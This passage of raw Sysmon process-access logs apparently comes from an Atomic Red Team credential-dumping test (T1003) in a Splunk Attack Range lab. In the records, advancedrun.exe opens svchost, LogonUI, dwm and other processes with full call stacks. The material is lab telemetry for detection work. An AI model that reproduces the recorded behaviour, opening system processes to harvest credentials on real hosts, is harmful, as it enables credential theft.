\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003967228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 